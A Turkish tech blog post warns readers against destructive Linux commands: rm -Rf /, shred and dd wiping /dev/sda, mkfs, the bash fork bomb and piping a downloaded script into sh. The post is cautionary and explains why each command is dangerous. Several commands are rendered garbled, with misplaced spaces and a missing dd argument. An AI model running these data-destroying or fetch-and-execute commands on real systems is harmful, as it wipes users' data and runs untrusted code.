Close Menu

    Apple’dan Büyük Değişiklik: iOS 19 Alacak ve Alamayacak iPhone Modelleri Açıklandı!

    2 Nisan 2025

    Siber Güvenlik Uzmanı Maaşları Ne Kadar?

    21 Eylül 2024

    Discord Ses Değiştirme Programları

    21 Eylül 2024

    Formatsız Ekran Kilidi Açma Yöntemleri

    21 Eylül 2024

    Nasıl Siber Güvenlik Uzmanı Olunur?

    21 Eylül 2024

    Ücretsiz En İyi 14 Android Telefon Hackleme Programları

    21 Eylül 2024

    İnstagram Taklitten Kapanan Hesap Nasıl Açılır?

    6 Eylül 2024

    Yapay Zeka ve Gelecekteki Teknolojik Dönüşüm

    27 Ağustos 2024

    BTK’dan Flaş Karar: Instagram Katalog Suçlar Nedeniyle Türkiye’de Kapatıldı

    5 Ağustos 2024

    Epic Games’de Yaz İndirimi Başladı: Son Tarih 1 Ağustos!

    30 Temmuz 2024
    Facebook X (Twitter) Instagram
    • Gizlilik Politikası
    • Hakkımızda
    • Reklam Ver
    • İletişim
    Facebook X (Twitter) Instagram Pinterest Vimeo
    Siber BasınSiber Basın
    • Anasayfa
    • Haber
      • Siber Güvenlik Haberleri
      • Hack Haberleri
      • Teknoloji Haberleri
      • Güvenlik Açıkları
    • Video
    • Blog
    • Kategoriler
      • Web
        • Spam
        • VPN
        • Mail
        • Seo
        • Tarayıcı
          • Firefox
          • Google Chrome
          • Opera
        • Deep Web
      • Film
        • Anime
        • Dizi
      • Diğer
        • Apple
          • Macbook
          • AirPods
          • iCloud
        • Vodafone
        • Samsung
        • Program
        • Torrent
        • Sony
        • Virüs
        • Google
          • Google Adsense
        • Turkcell
        • Winrar
        • PDF
        • Yandex
        • Netflix
        • Exxen
        • Amazon
        • E-Kitap
        • İntel
        • Zoom
        • Hosting
        • Microsoft
          • Windows
        • Veri Güvenliği
        • Hacker Grupları
      • İnternet
        • Wi-Fi
        • Proxy
      • Kripto Para
        • Bitcoin
        • Dogecoin
        • Ethereum
        • Kripto Para Borsaları
      • Mobil Telefon
        • Huawei
        • İphone
      • Mobil Uygulamalar
        • Whatsapp
        • App Store
      • Otomobil
        • BMW
        • Elektrikli Arabalar
        • Peugeot
        • Renault
      • Oyun
        • Cyberpunk
        • GTA
        • Call of Duty
        • Apex Legends
        • PlayStation
        • Xbox
        • PUBG
        • Valorant
        • Fortnite
        • Origin
        • Steam
        • Epic Games
        • Far Cry
        • Battlefield
        • Point Blank
        • Lords Mobile
        • Uplay
        • Legend Online
        • Discord
        • Zula
      • Sosyal Medya
        • Facebook
        • Instagram
        • Linkedin
        • Reddit
        • Snapchat
        • Spotify
        • Telegram
        • Tiktok
        • Twitter
        • Twitch
        • Youtube
        • Clubhouse
      • Uzay
        • Mars
      • Yazılım
        • Android
        • Linux
          • Ubuntu
        • WordPress
        • Xenforo
        • Programlama
        • İOS
      • Yapay Zeka
    Siber BasınSiber Basın
    Ana Sayfa - Blog - En Tehlikeli Linux Komutları Asla Denemeyin
    Blog

    En Tehlikeli Linux Komutları Asla Denemeyin

    Siber BasınBy Siber Basın14 Aralık 2021Yorum yapılmamış4 Mins Read
    Share Facebook Twitter Pinterest LinkedIn Tumblr Reddit Telegram Email
    En Tehlikeli Linux Komutları
    En Tehlikeli Linux Komutları
    Share
    Facebook Twitter LinkedIn Pinterest Email

    En tehlikeli linux komutları, sisteminize geri döndürülemez şekilde zarar verebilecek birçok komut burada. Bazıları diğerlerinden daha az şifreli, bazıları ise anlamsız gibi görünüyor. İşte Linux’ta bazıları kalıcı ve bazıları kurtarılabilen tehlikeli komutların bir listesi.

    İçindekiler

    Toggle
    • En Tehlikeli Linux Komutları
      • Tersine Çevrilebilir Linux Komutlarına Rağmen Tehlikeli Komutlar
    • Tehlikeli Linux Komutları

    En Tehlikeli Linux Komutları

    En Tehlikeli Linux Komutları

    rm -Rf /

    Bu komut çok ün kazandı ve özellikle tehlikelidir. Neyse ki, birçok UNIX sistemi kazara veya kasıtsız olarak gerçekleşmemesini sağlamak için rm komutuna bir güvenlik önlemi yerleştirmiştir. Bu kadar yıkıcı bir şeyin yanlışlıkla çalıştırılabileceğini düşünmek kafa karıştırıcı olabilir, ancak bu gerçekten bir BASH komut dosyasında başlatılmamış bir değişkeni kullanmak ve komutu çalıştırmadan önce kontrol etmemek kadar basittir.

    parçalama / dev / sda

    Shred, bazı veri kurtarma bilgisine sahip herhangi birinin herhangi bir önemli dosya için veri oluşturabileceği rm’nin aksine, özellikle tehlikeli bir komuttur, shred tam da adından da anlaşılacağı gibi yapar. Parçalama, rastgele bilgi üretmek için / dev / random veya / dev / urandom işletim sistemlerinden beslenir. Bu bilgi daha sonra, verileri geri alınamaz hale getirerek birkaç geçişte sürücünün üzerine yazmak için kullanılır. Verilerinizin çoğunu ele geçirmeden işlemi kesmeyi başarsanız bile, bölüm tablonuzu yeniden oluşturmanız ve dokunulmuş olabilecek dosya sistemlerini onarmanız gerekir. Parçalama, dikkatli kullanılmazsa kesinlikle tehlikeli bir komuttur.

    dd if = / dev / random = / dev / sda

    dd, inanılmaz derecede kullanışlı bir araçtır. Birimlerin, dosya sistemlerinin klonlarını yapmak, görüntüleri disklere yazmak ve hatta sürücüleri silmek için kullanılabilir. Yukarıdaki dd komutu, parçalamanın çok daha hızlı olması ve birden çok geçiş yapması ile parçalama ile hemen hemen aynı olan bir şeyi başarır. varsayılan olarak.

    mkfs.ext4 / dev / sda1

    Picasso’nun dediği gibi, “her yaratma eylemi önce bir yıkım eylemidir” ve aynısı mkfs için de geçerlidir. Buradaki hata özellikle ext4’te değil, sadece yeni bir dosya sistemi oluşturmak için birimdeki tüm mevcut verileri atmanız gerektiğidir. Açıkçası bu, parlak yeni bir disk için bir sorun değil, ancak sağduyulu bir şekilde kullanılırsa çalışan bir sistemi dizlerinin üzerine çökertebilir.

    mv / / dev / null

    Bu bizim ilkimiz ile aynı. / Dev / null’a yazılan her şey başarıyla yazılır. Bu, tamamlanması daha uzun sürebilmesine rağmen, bu komutun etkin bir şekilde ilk komutumuzla aynı olduğu anlamına gelir.

    Tersine Çevrilebilir Linux Komutlarına Rağmen Tehlikeli Komutlar

    : () {: |: &} ;:

    Bu şifreli dizi, en kötü ve gizemli olan BASH sihirbazlığıdır. BASH Fork Bomb’un ortak adıyla bilinir. Diğer isimleri Tavşan Virüsü veya Wabbit’dir. Yapısı zarif ve ölümcüldür, uygun güvenlik önlemleri alınmazsa herhangi bir sistemi durdurur.

    Komut, başlangıçta :() ile adında bir işlev oluşturur, daha sonra işlevin içeriğini {: |: &} ile tanımlamaya devam eder, bu yine çok basittir, çünkü yalnızca kendi kendini çalıştırır ve diğerine yönlendirir. süreci arka planı oluştururken kendisini çağırır. Son olarak, fonksiyon tanımı; ve ile aradı:. Bu tür saldırılara karşı savunma yapmak için /etc/security/limits.conf yapılandırma dosyasında önlemleri uygulamanız gerekir.

    wget https://unknownsource.com/possarilydangerous.sh -O- | sh

    Bu hiç akıllıca olmamalı. Wget kullanışlı bir araç olsa da, indirdiğiniz her şey, özellikle çalıştırılabilir dosyalar, bilinmeyen veya güvenilmeyen bir kaynaktan geliyorsa incelenmelidir. Bu komut, komut dosyasını indirir ve genellikle BASH’a sembolik bir bağlantı olan sh’ye yönlendirir. Bu nedenle, kullanıcının yeterli yetkiye sahip olması koşuluyla, komut dosyasındaki herhangi bir şey yürütülecektir. Komut dosyasının içeriği büyük olasılıkla daha önce bahsedilen komutlardan herhangi biri olabilir.

    gunzip güvenilmeyen.gz

    Nadiren bilinen Dekompresyon Bombası, yaklaşımında oldukça benzersizdir. Sıkıştırma, bilgilerin daha yüksek oranlarda sıkıştırılması sırasına dayanır, birler veya sıfırlarla dolu bir dosyanın çok yüksek bir orana sıkıştırılabileceği göz önünde bulundurulduğunda, ortaya çıkan dosya orijinal den daha küçük siparişler olabilir. İşte Dekompresyon Bombası tam olarak budur.

    Açıldığında disk alanını dolduracak bir dosyadır. Bir Linux makinesinde bu, günlüğe kaydetmeyi veya bir dosyaya yazmayı gerektiren birçok sistem hizmeti için ölümcül olabilir. Bu nedenle, güvenilmeyen herhangi bir dosyayı açmak çok tehlikeli olabilir.

    command> file.conf

    BASH’in yeniden yönlendirme özelliği son derece kullanışlıdır, ancak özen gösterilmeden kullanıldığında, önemli bir yapılandırma dosyasını silebilir.

    > Ve >> arasında ayrım yapmayı veya değiştirmeyi ve eklemeyi hatırlamak yeni başlayanlar için zor olabilir. Profesyonellerin bunu gözden kaçırması ve dosyaları kaybetmesi bile yaygındır. Bu nedenle, çalıştırdığınız komutları her zaman iki kez, hatta üç kez kontrol etmelisiniz.

    ^ hata ^ düzeltme

    Bu, önceki komutta yapılan bir hatayı düzeltmek için yapılan bir değişikliktir. Araç kutunuzun en üstünde tutmanız gereken bir şey değil, ancak uzun komutları çalıştırırken özellikle kullanışlı bir şey.

    Buradaki tehlike, kötü amaçlı içeriği önceden çalıştırılan komutlarla değiştire bilmesinden kaynaklanmaktadır, bu nedenle hem önceki komutu hem de değiştirmeyi incelerken dikkatli olmak özellikle önemlidir.

    Tehlikeli Linux Komutları

    Elbette, bir sistemi bozabilecek veya kalıcı olarak bozabilecek daha birçok komut vardır. Ama bu komutlar çok sıkıntılı komutlar bildiğiniz başka komutlar varsa yorumlarda bize bildirebilirsiniz. Bir başka makalemiz olan Linux Üzerinde Zoom Nasıl Kurulur? makalemize de göz atabilirsiniz.

    Share. Facebook Twitter Pinterest LinkedIn Tumblr Email
    Previous ArticleDünyadaki En Önemli Programlama Dilleri Hangileridir?
    Next Article Linux İşletim Sistemleri İçin En İyi 10 Şifre Yöneticisi
    Siber Basın
    • Facebook
    • X (Twitter)
    • Instagram

    Siber dünyada gerçekleşen tüm olayları, hack haberlerini, teknoloji gelişmelerini ve bir çok konuda bilgilendirici makaleleri araştırıp sizler ile paylaşıyorum.

    Related Posts

    Blog

    Siber Güvenlik Uzmanı Maaşları Ne Kadar?

    21 Eylül 2024
    Blog

    Discord Ses Değiştirme Programları

    21 Eylül 2024
    Blog

    Formatsız Ekran Kilidi Açma Yöntemleri

    21 Eylül 2024
    Add A Comment
    Leave A Reply Cancel Reply

    Apple’dan Büyük Değişiklik: iOS 19 Alacak ve Alamayacak iPhone Modelleri Açıklandı!

    2 Nisan 2025

    Siber Güvenlik Uzmanı Maaşları Ne Kadar?

    21 Eylül 2024

    Discord Ses Değiştirme Programları

    21 Eylül 2024

    Formatsız Ekran Kilidi Açma Yöntemleri

    21 Eylül 2024
    En İyi Gönderiler

    İnstagram E-Posta Adresi Nasıl Bulunur?

    1 Ağustos 2020

    İnstagram Taklitten Kapanan Hesap Nasıl Açılır?

    6 Eylül 2024

    Ücretsiz En İyi 14 Android Telefon Hackleme Programları

    21 Eylül 2024
    Paylaş
    • Facebook
    • YouTube
    • TikTok
    • WhatsApp
    • Twitter
    • Instagram
    HAKKIMIZDA
    HAKKIMIZDA

    Siber Basın, 2019 yılında temelleri atılan, okurlarına siber dünyayı yakından takip etme fırsatı vermek, bilgilendirici konular ile sanal dünyaya hazırlık aşamasında gelişimlerini sağlamakta olanaklar sunmak ve yer altı dünyasının ufuklarını gün yüzüne daha çok ulaştırmak amacıyla belirli kişi veya kişiler tarafından açılmıştır.

    Facebook X (Twitter) Instagram YouTube
    SİZİN İÇİN SEÇTİKLERİMİZ

    Apple’dan Büyük Değişiklik: iOS 19 Alacak ve Alamayacak iPhone Modelleri Açıklandı!

    2 Nisan 2025

    Siber Güvenlik Uzmanı Maaşları Ne Kadar?

    21 Eylül 2024

    Discord Ses Değiştirme Programları

    21 Eylül 2024
    Yeni Yorumlar
    • 2023’de Android ve iOS İçin En İyi Çeviri Uygulamaları için Bradshaw
    • WHM Nedir? Web Hosting Yönetimi Hakkında Bilmeniz Gerekenler için streameast
    • CMD Kullanarak İnterneti Hızlandırma için maxwin login
    • 2023’de Android ve iOS İçin En İyi Çeviri Uygulamaları için maxwin casino malaysia
    • İnstagram E-Posta Adresi Nasıl Bulunur? için Bsy
    Facebook X (Twitter) Instagram Pinterest
    • Anasayfa
    • Gizlilik Politikası
    • Hakkımızda
    • Hack Haberleri
    • Teknoloji Haberleri
    • Siber Güvenlik Haberleri
    • Hacker Grupları
    • Mobil Telefon
    • Yazılım
    • Oyun
    • İnternet
    • Güvenlik Açıkları
    • Windows
    • Reklam Ver
    • İletişim
    • Telefon Takip
    • Siber Güvenlik Nedir?
    • Siber suçlarla mücadele polisi nasıl olunur?
    • Siber güvenlik uzmanı olmak için hangi bölüme gidilir?
    • Siber güvenlik uzmanı maaşları ne kadar?
    • Nasıl siber güvenlik uzmanı olunur?
    • Telefon hackleme programları
    • Formatsız ekran kilidi açma
    • Telefon temizleme ve hızlandırma programları
    • Youtube video indirme uygulamaları
    • Fake hesabın kimin olduğunu bulma
    • Snapchat engel kaldırma
    • Discord ses değiştirme programları
    • İnstagram taklitten kapanan hesap açma
    • İphone hackleme
    • İnstagram e-posta bulma
    • Facebook e-posta bulma
    • Twitter e-posta bulma
    • Twitter hesap çalma
    • Facebook hesabı çalma
    • İnstagram hesabı çalma
    • Siber Güvenlik Blog
    • Torrent Oyun İndirme Siteleri
    • PDF Şifre Kırma
    • Şifre Kırma Teknikleri
    • Telefon Şifresi Kırma
    • Winrar Şifre Kırma
    • Wifi şifre kırma
    © 2025 - Teknoloji, Siber Güvenlik ve Hack Haberleri - Tüm Hakları Saklıdır.

    Type above and press Enter to search. Press Esc to cancel.